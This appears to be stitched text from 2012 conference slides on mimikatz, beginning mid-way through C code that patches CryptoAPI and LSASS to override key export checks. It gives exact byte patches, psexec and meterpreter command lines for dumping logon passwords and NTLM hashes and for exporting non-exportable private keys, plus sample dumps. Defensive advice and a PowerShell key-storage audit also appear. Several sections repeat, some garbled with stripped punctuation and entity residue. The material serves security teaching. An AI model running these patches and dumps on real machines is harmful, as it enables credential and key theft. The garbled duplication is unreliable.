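    ok = patch_and_verify(capi1, sizeof capi1, 0, 0x0AC0B7CBu, &t);
    printf("CAPI site 1: ok=%d target=%08X now %02X %02X ...\n", ok, (unsigned)t, capi1[0], capi1[1]);
    ok = patch_and_verify(capi2, sizeof capi2, 0, 0x0AC1F749u, &t);
    printf("CAPI site 2: ok=%d target=%08X now %02X %02X ...\n", ok, (unsigned)t, capi2[0], capi2[1]);
    ok = patch_and_verify(cng, sizeof cng, 0, 0x6C815210u, &t);
    printf("CNG site   : ok=%d target=%08X now %02X %02X\n", ok, (unsigned)t, cng[0], cng[1]);
    return 0;
}
```

The verification step is the part worth keeping when you write a real patcher: decode the branch and compare targets before and after, so that a signature match on the wrong bytes (a different rsaenh.dll build, a relocated module) is refused instead of silently corrupting the CSP or, worse, LSASS.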
mimikatz crypto / patch CNG: demo time
Import, export, import as not exportable... export again.
mimikatz crypto / patch CNG: limitations
The patch operation needs some privileges:
- Admin (debug privilege)
- SYSTEM
mimikatz crypto::patchcng only deals with:
- Microsoft Software Key Storage Provider (maybe other algorithms than RSA)
Not a limitation of mimikatz, but the MMC certificates snap-in cannot export CNG certificates... even those that are exportable (hu?)
- certutil can...
mimikatz crypto / patch CNG: bonus
After one admin has patched LSASS, all users of the current system benefit from the extra exports
- until reboot / KeyIso service restart
Some other programs that don't check the export flag before asking for the export can work too
- Yeah, like the good old certutil
Before the patch (certutil output translated from French):
    C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx
    MY
    ================ Certificate 1 ================
    [...]
    Cert Hash(sha1): dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
      Key Container = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
      Provider = Microsoft Software Key Storage Provider
    Private key is NOT exportable
    Encryption test passed
    CertUtil: -exportPFX command FAILED: 0x8009000b (-2146893813)
    CertUtil: Key not valid for use in specified state.
After the patch:
    C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx
    MY
    ================ Certificate 1 ================
    [...]
    Cert Hash(sha1): dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
      Key Container = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
      Provider = Microsoft Software Key Storage Provider
    Encryption test passed
    CertUtil: -exportPFX command completed successfully.
mimikatz crypto: memo
Some commands:
    mimikatz crypto::patchcapi crypto::exportCertificates exit
    psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe crypto::patchcapi crypto::patchcng crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE crypto::exportKeys computer exit
    mimikatz crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE "Remote Desktop"
    mimikatz privilege::debug crypto::patchcng crypto::patchcapi crypto::exportCertificates crypto::exportKeys exit
Password
- PFX files are protected by this password: mimikatz
Keys
- When you import a certificate multiple times, exportable or not, Windows makes duplicate keys
- When you delete a certificate, Windows does not delete its private key... funny, isn't it?
  - So yes, mimikatz can export it
mimikatz crypto: what we can do
Exactly the same as for sekurlsa: prevent access to accounts/computer
- no admin, no admin, no admin...
Basics
- Use smartcards/tokens for user certificates
- Use Hardware Security Modules (HSM), even SoftHSM
More in depth
- See what Microsoft can do with the TPM from Windows 8
  - Virtual SmartCard seems promising
- Verify vendors' implementations (Lenovo, Dell, ...) of TPM CSP/KSP
  - Their biometrics stuff was a little buggy ;)
mimikatz: what else can it do?
- Play with minesweeper
- Manipulate some handles
- Pass the hash
- Dump SAM / AD
- Stop event monitoring
- Patch Terminal Server
- Basic GPO bypass
- Applocker / SRP bypass
- Driver
  - Play with tokens & privileges
  - Display SSDT x86 & x64
  - List minifilter actions
  - List notifications (process, thread, image, registry)
  - List object hooks and procedures
  - ...
- ...
mimikatz: that's all folks
Thanks to / Merci à
- my girlfriend for her support (her LSASS crashed a few times)
- Application Security Forum for offering me this great opportunity
  - Partners and Sponsors, for sure
- Microsoft, for always considering it as normal/acceptable
- Security friends/community for their ideas & challenges
  - nagual, newsoft, mubix, ...
- You, for your attention
Questions?
Don't be shy ;)
especially if you have written the corresponding slide number
Blog, Source Code & Contact
- blog: http://blog.gentilkiwi.com/
- mimikatz: http://blog.gentilkiwi.com/mimikatz
- source: https://code.google.com/p/mimikatz
- email: benjamin@gentilkiwi.com
mimikatz sekurlsa: LsaEncryptMemory (NT6)
Depending on the size of the secret, LsaEncryptMemory uses:
- 3DES
- AES
[Diagram: mimikatz copies from lsass (lsasrv) the InitializationVector (BYTE[16]) and the h3DesKey / hAesKey handles; each handle is a KIWI_BCRYPT_KEY whose "cle" pointer leads to the KIWI_BCRYPT_KEY_DATA holding the key material.]
Structures used by mimikatz to read the key handles (as on the slide):
    typedef struct _KIWI_BCRYPT_KEY_DATA {
        DWORD size;
        DWORD tag;
        DWORD type;
        DWORD unk0;
        DWORD unk1;
        DWORD unk2;
        DWORD unk3;
        PVOID unk4;
        BYTE  data[ANYSIZE_ARRAY]; /* etc. */
    } KIWI_BCRYPT_KEY_DATA, *PKIWI_BCRYPT_KEY_DATA;

    typedef struct _KIWI_BCRYPT_KEY {
        DWORD size;
        DWORD type;
        PVOID unk0;
        PKIWI_BCRYPT_KEY_DATA cle;
        PVOID unk1;
    } KIWI_BCRYPT_KEY, *PKIWI_BCRYPT_KEY;
mimikatz sekurlsa: memo
Security Packages
    Package          Symbols                                                  Type
    tspkg            tspkg!TSGlobalCredTable                                  RTL_AVL_TABLE
    wdigest          wdigest!l_LogSessList                                    LIST_ENTRY
    livessp          livessp!LiveGlobalLogonSessionList                       LIST_ENTRY
    kerberos (nt5)   kerberos!KerbLogonSessionList                            LIST_ENTRY
    kerberos (nt6)   kerberos!KerbGlobalLogonSessionTable                     RTL_AVL_TABLE
    msv1_0           lsasrv!LogonSessionList / lsasrv!LogonSessionListCount   LIST_ENTRY / ULONG
Protection Keys
    Key     NT 5 symbols
    RC4     lsasrv!g_cbRandomKey / lsasrv!g_pRandomKey
    DESx    lsasrv!g_pDESXKey / lsasrv!g_Feedback

    Key     NT 6 symbols
    (IV)    lsasrv!InitializationVector
    3DES    lsasrv!h3DesKey
    AES     lsasrv!hAesKey
mimikatz sekurlsa: memo
Some commands:
    mimikatz privilege::debug sekurlsa::logonPasswords full exit
    psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe sekurlsa::logonPasswords full exit
    meterpreter > execute -H -c -i -m -f /pentest/passwords/mimikatz/mimikatz_x86.exe
Sample session (output translated from French):
    mimikatz 1.0 x64 (RC)  /* Traitement du Kiwi (Aug 2 2012 01:32:28) */  http://blog.gentilkiwi.com/mimikatz

    mimikatz # privilege::debug
    Request to ENABLE privilege : SeDebugPrivilege : OK

    mimikatz # sekurlsa::logonPasswords full
    Authentication Id      : 0;234870
    Authentication package : NTLM
    Primary user           : Gentil Kiwi
    Authentication domain  : vm-w8-rp-x
        msv1_0   : User : Gentil Kiwi  Domain : vm-w8-rp-x  LM hash : d0e9aee149655a6075e4540af1f22d3b  NTLM hash : cc36cf7a8514893efccd332446158b1a
        kerberos : User : Gentil Kiwi  Domain : vm-w8-rp-x  Password : waza1234
        wdigest  : User : Gentil Kiwi  Domain : vm-w8-rp-x  Password : waza1234
        tspkg    : User : Gentil Kiwi  Domain : vm-w8-rp-x  Password : waza1234
        livessp  : n.t. (LUID KO)
mimikatz sekurlsa: what we can do
Basics
- No physical access to the computer (first step to pass the hash, then pass the pass)
- No admin rights, system rights, debug privileges (...)
- Disable local admin accounts
- Strong passwords (haha, it was a joke, so useless ;)
- For privileged accounts, network logon instead of interactive (when possible)
- Audit: pass the hash keeps traces and can lock accounts
- No admin rights, system rights, debug privileges, even for VIPs
- Use a separate network (or forest) for privileged tasks
More in depth
- Force strong authentication (SmartCard & Token) $ €
- Short validity for Kerberos tickets
- No delegation
- Disable NTLM (available with NT6)
- Nothing exotic:
  - biometrics (it keeps the password somewhere and pushes it to Windows)
  - single sign on
- Stop shared secrets for authentication, push Public/Private stuff (like keys ;))
- Take the opportunities to stop backward compatibility
- Disable faulty providers
  - Is it supported by Microsoft?
  - Even if you can disable LiveSSP, TsPkg and WDigest, will you disable Kerberos and msv1_0?
mimikatz crypto: what is it?
A little module that I wrote to:
- play with Windows Cryptographic API, CNG and RSA keys
- automate the export of certificates/keys
  - even those which are "not" exportable
What the crypto module can do:
- List
  - Providers
  - Stores
  - Certificates
  - Keys
- Export
  - Certificates
    - public, in DER format
    - with private keys, in PFX format
  - Private keys in PVK format
    - it's cool, OpenSSL can deal with it too
- Patch
  - CryptoAPI in mimikatz context
  - CNG in LSASS context (again?)
mod_mimikatz_crypto
mimikatz cryptohow itrsquos protected
Private keys are DPAPI protectedndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened)ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 39
Constraint for most userUnavailable for computer keys
certutil -importpfx mycertp12 NoExportcertutil -csp Microsoft Enhanced Cryptographic Provider v10 -importpfx mycertp12 NoExport
mimikatz crypto capihow it works
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquondash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellipndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 40
mimikatz crypto capihow itrsquos exported ( level)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 41
Process
CryptoAPI and RSA CSP
Exportable
Load Private Key
Exported Key
yes
NTE_BAD_KEY_STATE
no
DPAPI Decode
PLAYSKOOL
Ask to export Key
mimikatz :: crypto :: patchcapi / because I own my process
When we want to export a certificate with its private key (or only the key), it goes into rsaenh!CPExportKey.
This function does all the work to prepare the export and checks if the key is exportable.

mimikatz # crypto::exportCertificates
Emplacement : 'CERT_SYSTEM_STORE_CURRENT_USER'\My
- Benjamin Delpy
	Container Clé  : 470ADFBA-8718-4014-B05E-B30776B75A03
	Provider       : Microsoft Enhanced Cryptographic Provider v1.0
	Type           : AT_KEYEXCHANGE
	Exportabilité  : NON
	Taille clé     : 2048
	Export privé dans 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.pfx' : KO
		(0x8009000b) Clé non valide pour l'utilisation dans l'état spécifié
	Export public dans 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.der' : OK

================ Certificat 0 ================
Numéro de série : 112169417a1c3ef46a301f99385f50680fa0
Émetteur : CN=GlobalSign CodeSigning CA - G2, O=GlobalSign nv-sa, C=BE
Objet : CN=Benjamin Delpy, C=FR
Il ne s'agit pas d'un certificat racine
Hach. cert. (sha1) : ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
	Conteneur de clé = 470ADFBA-8718-4014-B05E-B30776B75A03
	Fournisseur = Microsoft Enhanced Cryptographic Provider v1.0
La clé privée NE PEUT PAS être exportée
Succès du test de cryptage
CertUtil: -exportPFX ÉCHEC de la commande : 0x8009000b (-2146893813)
CertUtil: Clé non valide pour l'utilisation dans l'état spécifié
mimikatz :: crypto :: patchcapi / because I own my process
So what? A module in my own process returns that I can't do something? CryptoAPI is in my memory space, let's patch it!
I wrote "4" bytes in my memory space:

.text:0AC0B7CB 0F 85 33 C7 FF FF    jnz  continue_key_export_or_archive
.text:0AC0B7CB 90                   nop
.text:0AC0B7CC E9 33 C7 FF FF       jmp  continue_key_export_or_archive

.text:0AC1F749 0F 85 B6 3B FF FF    jnz  continue_key_export_or_archive_prepare
.text:0AC1F749 90                   nop
.text:0AC1F74A E9 B6 3B FF FF       jmp  continue_key_export_or_archive_prepare
mimikatz :: crypto :: patchcapi / demo time
Import, export, import as not exportable…, export.
mimikatz :: crypto :: patchcapi / limitations
Because:
– I'm lazy
– I've seen, in the majority of cases, RSA keys for real-life use
  • Elliptic Curve a little…
mimikatz crypto::patchcapi only deals with:
– Microsoft Base Cryptographic Provider v1.0
– Microsoft Enhanced Cryptographic Provider v1.0
– Microsoft Enhanced RSA and AES Cryptographic Provider
– Microsoft RSA SChannel Cryptographic Provider
– Microsoft Strong Cryptographic Provider
…all based on rsaenh.dll
mimikatz :: crypto :: cng / how it works
"Cryptography API: Next Generation (CNG) is the long-term replacement for the CryptoAPI. CNG is designed to be extensible at many levels and cryptography agnostic in behavior."
– http://msdn.microsoft.com/library/windows/desktop/aa376210.aspx
"To comply with common criteria (CC) requirements, the long-lived keys must be isolated so that they are never present in the application process. CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default."
This time, key operations are not made in the "user" process context.
Processes use RPC to call "Key isolation service" (keyiso) functions.
It seems more secure than CryptoAPI…
– It is, but it's not perfect…
mimikatz :: crypto :: cng / how it's exported (… level)
[Diagram: the process calls CNG, which goes over RPC to the KeyIso service inside the LSASS process (an NT6 System protected process, mandatory label ML_SYSTEM with SYSTEM_MANDATORY_LABEL_NO_WRITE_UP and SYSTEM_MANDATORY_LABEL_NO_READ_UP). LSASS loads the private key (DPAPI decode) and, on an export request, checks the "Exportable" flag: yes returns the exported key, no returns NTE_NOT_SUPPORTED.]
mimikatz :: crypto :: patchcng / because sometimes I own LSASS
When we want to export a certificate with its private key (or only the key), RPC calls lead to lsass (keyiso) ncrypt!SPCryptExportKey.
This function does all the work to prepare the export and checks if the key is exportable.

mimikatz # crypto::exportKeys
[user] Clés CNG
- cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
	Exportabilité  : NON
	Taille clé     : 2048
	Export privé dans 'cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318.pvk' : KO
mod_crypto::ng::getPrivateKey ; PrivateKeyBlobToPVK (0x80090029) : L'opération demandée n'est pas prise en charge
mimikatz :: crypto :: patchcng / because sometimes I own LSASS
This time, checks and keys are in the LSASS process… And what?
I wrote "1" byte in LSASS memory space…

.text:6C815210 75 1C    jnz  short continue_key_export
.text:6C815210 EB 1C    jmp  short continue_key_export
mimikatz :: crypto :: patchcng / demo time
Import, export, import as not exportable…, export again.
mimikatz :: crypto :: patchcng / limitations
Patch operation needs some privileges:
– Admin (debug privilege)
– SYSTEM
mimikatz crypto::patchcng only deals with:
– Microsoft Software Key Storage Provider (maybe other algorithms than RSA)
Not a limitation of mimikatz, but the MMC add-in for certificates cannot export CNG certificates… even those that are exportable (huh?)
– certutil can…
mimikatz :: crypto :: patchcng / bonus
After one admin has patched LSASS, all users of the current system benefit from the extra exports
– until reboot / KeyIso service restart
Some other programs that don't check the export flag before asking for the export can work too
– Yeah, like the good old certutil

C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx
MY
================ Certificat 1 ================
[…]
Hach. cert. (sha1) : dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
	Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
	Fournisseur = Microsoft Software Key Storage Provider
La clé privée NE PEUT PAS être exportée
Succès du test de chiffrement
CertUtil: -exportPFX ÉCHEC de la commande : 0x8009000b (-2146893813)
CertUtil: Clé non valide pour l'utilisation dans l'état spécifié

C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx
MY
================ Certificat 1 ================
[…]
Hach. cert. (sha1) : dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
	Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
	Fournisseur = Microsoft Software Key Storage Provider
Succès du test de chiffrement
CertUtil: -exportPFX La commande s'est terminée correctement.
mimikatz :: crypto / memo
Some commands:
mimikatz crypto::patchcapi crypto::exportCertificates exit
psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe crypto::patchcapi crypto::patchcng crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE crypto::exportKeys computer exit
mimikatz "crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop"
mimikatz privilege::debug crypto::patchcng crypto::patchcapi crypto::exportCertificates crypto::exportKeys exit
Password
– PFX files are protected by this password: mimikatz
Keys
– When you import a certificate multiple times, exportable or not, Windows makes duplicate keys
– When you delete a certificate, Windows does not delete its private key… funny, isn't it?
  • So yes, mimikatz can export it
mimikatz :: crypto / what we can do
Exactly the same as for sekurlsa: it will prevent access to accounts/computer
– no admin, no admin, no admin…
Basics
– Use smartcards/tokens for users' certificates
– Use Hardware Security Modules (HSM), even SoftHSM
More in depth
– See what Microsoft can do with the TPM from Windows 8
  • Virtual SmartCard seems promising
– Verify vendors' implementations (Lenovo, Dell, …) of TPM CSP/KSP
  • Their biometrics stuff was a little buggy ;)
mimikatz / what else can it do?
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM / AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker / SRP bypass
Driver
– Play with tokens & privileges
– Display SSDT x86 & x64
– List minifilter actions
– List Notifications (process, thread, image, registry)
– List Object hooks and procedures
– …
…
mimikatz / that's all folks
Thanks to
– my girlfriend for her support (her LSASS crashed a few times)
– Application Security Forum for offering me this great opportunity
  • Partners and Sponsors, for sure
– Microsoft, for always considering it as normal/acceptable
– Security friends/community for their ideas & challenges
  • nagual, newsoft, mubix, …
– You, for your attention
Questions?
Don't be shy ;)
especially if you have written down the corresponding slide number
Blog, Source Code & Contact
blog: http://blog.gentilkiwi.com
mimikatz: http://blog.gentilkiwi.com/mimikatz
source: https://code.google.com/p/mimikatz
email: benjamin@gentilkiwi.com
mimikatz :: sekurlsa / memo
Some commands:
mimikatz privilege::debug sekurlsa::logonPasswords full exit
psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe sekurlsa::logonPasswords full exit
meterpreter > execute -H -c -i -m -f /pentest/passwords/mimikatz/mimikatz_x86.exe

mimikatz 1.0 x64 (RC)	/* Traitement du Kiwi (Aug 2 2012 01:32:28) */	http://blog.gentilkiwi.com/mimikatz

mimikatz # privilege::debug
Demande d'ACTIVATION du privilège : SeDebugPrivilege : OK

mimikatz # sekurlsa::logonPasswords full

Authentification Id        : 0;234870
Package d'authentification : NTLM
Utilisateur principal      : Gentil Kiwi
Domaine d'authentification : vm-w8-rp-x
	msv1_0 :	Utilisateur : Gentil Kiwi ; Domaine : vm-w8-rp-x ; Hash LM : d0e9aee149655a6075e4540af1f22d3b ; Hash NTLM : cc36cf7a8514893efccd332446158b1a
	kerberos :	Utilisateur : Gentil Kiwi ; Domaine : vm-w8-rp-x ; Mot de passe : waza1234
	wdigest :	Utilisateur : Gentil Kiwi ; Domaine : vm-w8-rp-x ; Mot de passe : waza1234
	tspkg :	Utilisateur : Gentil Kiwi ; Domaine : vm-w8-rp-x ; Mot de passe : waza1234
	livessp :	n.t. (LUID KO)
mimikatz :: sekurlsa / what we can do
Basics
– No physical access to the computer (first step to pass the hash, then pass the pass)
– No admin rights, system rights, debug privileges (…)
– Disable local admin accounts
– Strong passwords (haha, it was a joke, so useless ;))
– For privileged accounts, network logon instead of interactive (when possible)
– Audit: pass the hash keeps traces and can lock accounts
– No admin rights, system rights, debug privileges, even for VIPs
– Use a separate network (or forest) for privileged tasks
More in depth
– Force strong authentication (SmartCard & Token) $ €
– Short validity for Kerberos tickets
– No delegation
– Disable NTLM (available with NT6)
– Nothing exotic
  • biometrics (it keeps the password somewhere and pushes it to Windows)
  • single sign-on
– Stop shared secrets for authentication, push public/private stuff (like keys ;))
– Take opportunities to stop retro-compatibility
– Disable faulty providers
  • Is it supported by Microsoft?
  • Even if you can disable LiveSSP, TsPkg and WDigest, will you disable Kerberos and msv1_0?
mimikatz :: crypto / what is it?
A little module that I wrote to:
– play with the Windows Cryptographic API, CNG and RSA keys
– automate the export of certificates/keys
  • Even those which are "not" exportable
What the crypto module can do:
– List
  • Providers
  • Stores
  • Certificates
  • Keys
– Export
  • Certificates
    – public, in DER format
    – with private keys, in PFX format
  • Private keys in PVK format
    – it's cool, OpenSSL can deal with it too
– Patch
  • CryptoAPI in mimikatz context
  • CNG in LSASS context (again!)
mod_mimikatz_crypto
mimikatz :: crypto / how it's protected
Private keys are DPAPI protected
– You cannot reuse private key files on another computer
  • At least not without the master keys and/or passwords of the users
Computer/User can load their own keys because they have enough secrets to do it (ex: session opened)
– Yes, a computer/server opens a "session"
Export/Usage can be limited by:
– Password
– Popup
– Export/Archive flag not present
(Password and popup: a constraint for most users, and unavailable for computer keys)
certutil -importpfx mycert.p12 NoExport
certutil -csp "Microsoft Enhanced Cryptographic Provider v1.0" -importpfx mycert.p12 NoExport
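The export flag described above is a check performed in software (in the CSP for CryptoAPI, in the KeyIso service for CNG), so the practical question for a defender is which private keys live in a software provider at all versus in a smart card or TPM provider, as the "what we can do" slide recommends. The following PowerShell audit is an added example, not code from the slides, mimikatz or certutil; it assumes Windows PowerShell 5.1 or later with .NET 4.6+ (for RSACertificateExtensions), an elevated session for LocalMachine keys, and the function names and the hardware-provider name heuristic are the editor's own choices.

```powershell
# Added example: report where each certificate's private key is stored and whether the
# "exportable" flag is the only thing protecting it. Not from the slides or mimikatz.
function Get-PrivateKeyStorage {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)]
        [System.Security.Cryptography.X509Certificates.X509Certificate2]$Certificate
    )

    $result = [ordered]@{
        Subject    = $Certificate.Subject
        Thumbprint = $Certificate.Thumbprint
        Api        = 'none'      # 'CNG' (KSP, key held by KeyIso in LSASS) or 'CryptoAPI' (CSP, in-process)
        Provider   = $null
        Hardware   = $false      # smart card / TPM backed: the key is never in software memory
        Exportable = $null       # the flag the slides show being checked by CPExportKey / SPCryptExportKey
    }

    if ($Certificate.HasPrivateKey) {
        try {
            # Returns RSACng for CNG keys, RSACryptoServiceProvider for CryptoAPI keys, $null for non-RSA keys.
            $rsa = [System.Security.Cryptography.X509Certificates.RSACertificateExtensions]::GetRSAPrivateKey($Certificate)
            if ($rsa -is [System.Security.Cryptography.RSACng]) {
                $key = $rsa.Key
                $result.Api      = 'CNG'
                $result.Provider = $key.Provider.Provider
                # Export policy as reported by the KSP over RPC; nothing is exported here.
                $result.Exportable = (($key.ExportPolicy -band [System.Security.Cryptography.CngExportPolicies]::AllowExport) -ne 0)
                # Heuristic (assumption): the in-box smart card and TPM ("Platform Crypto") KSPs.
                $result.Hardware = [bool]($key.Provider.Provider -match 'Smart Card|Platform Crypto')
            }
            elseif ($rsa -is [System.Security.Cryptography.RSACryptoServiceProvider]) {
                $csp = $rsa.CspKeyContainerInfo
                $result.Api        = 'CryptoAPI'
                $result.Provider   = $csp.ProviderName
                $result.Exportable = $csp.Exportable
                $result.Hardware   = $csp.HardwareDevice
            }
            else {
                $result.Api = 'non-RSA'
            }
        }
        catch {
            $result.Api = "error: $($_.Exception.Message)"
        }
    }
    [pscustomobject]$result
}

function Get-KeyExposureReport {
    # Rates each key against the slides' point: a key in a software provider is recoverable by
    # an administrator whether or not it is flagged exportable; only hardware storage holds.
    param([string[]]$StorePath = @('Cert:\LocalMachine\My', 'Cert:\CurrentUser\My'))

    foreach ($path in $StorePath) {
        foreach ($cert in (Get-ChildItem -Path $path | Where-Object { $_.HasPrivateKey })) {
            $storage = Get-PrivateKeyStorage -Certificate $cert
            $risk = 'undetermined'
            if ($storage.Hardware) {
                $risk = 'hardware-backed'
            }
            elseif ($storage.Exportable -eq $true) {
                $risk = 'software key, export allowed'
            }
            elseif ($storage.Exportable -eq $false) {
                $risk = 'software key, flagged non-exportable (flag only, not a control against an admin)'
            }
            $storage |
                Add-Member -NotePropertyName Store -NotePropertyValue $path -PassThru |
                Add-Member -NotePropertyName Risk  -NotePropertyValue $risk -PassThru
        }
    }
}

Get-KeyExposureReport | Sort-Object Risk | Format-Table Store, Subject, Api, Provider, Risk -AutoSize
```

Keys whose Risk column is not "hardware-backed" are the ones the slides' patching demos apply to; moving them to a smart card, TPM KSP or HSM is the fix, not the NoExport flag.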
mimikatz crypto capihow it works
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquondash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellipndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 40
mimikatz crypto capihow itrsquos exported ( level)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 41
Process
CryptoAPI and RSA CSP
Exportable
Load Private Key
Exported Key
yes
NTE_BAD_KEY_STATE
no
DPAPI Decode
PLAYSKOOL
Ask to export Key
mimikatz crypto patchcapibecause I own my process
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 42
mimikatz cryptoexportCertificatesEmplacement CERT_SYSTEM_STORE_CURRENT_USERMy
- Benjamin DelpyContainer Cleacute 470ADFBA-8718-4014-B05E-B30776B75A03Provider Microsoft Enhanced Cryptographic Provider v10Type AT_KEYEXCHANGEExportabiliteacute NONTaille cleacute 2048Export priveacute dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpypfx KO
(0x8009000b) Cleacute non valide pour lutilisation dans leacutetat speacutecifieacuteExport public dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpyder OK
================ Certificat 0 ================Numeacutero de seacuterie 112169417a1c3ef46a301f99385f50680fa0Eacutemetteur CN=GlobalSign CodeSigning CA - G2 O=GlobalSign nv-sa C=BEObjet CN=Benjamin Delpy C=FRIl ne sagit pas dun certificat racineHach cert (sha1) ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
Conteneur de cleacute = 470ADFBA-8718-4014-B05E-B30776B75A03Fournisseur = Microsoft Enhanced Cryptographic Provider v10
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de cryptageCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
Exportable
mimikatz crypto patchcapibecause I own my process
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 43
text0AC0B7CB 0F 85 33 C7 FF FF jnz continue_key_export_or_archive
text0AC0B7CB 90 nop
text0AC0B7CC E9 33 C7 FF FF jmp continue_key_export_or_archive
text0AC1F749 0F 85 B6 3B FF FF jnz continue_key_export_or_archive_prepare
text0AC1F749 90 nop
text0AC1F74A E9 B6 3B FF FF jmp continue_key_export_or_archive_prepare
mimikatz crypto patchcapidemo time
Import export import as not exportablehellip export
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 44
mimikatz crypto patchcapilimitations
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life usebull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 45
mimikatz crypto cnghow it works
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquondash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellipndash It is but itrsquos not perfecthellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 46
mimikatz crypto cnghow itrsquos exported ( level)
KeyIso Service (LSASS Process)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 47
Process
CNG
Exportable
Load Private Key
Exported Key
yes
NTE_NOT_SUPPORTED
RPC
DPAPI Decode
PLAYSKOOL
Ask to export Key
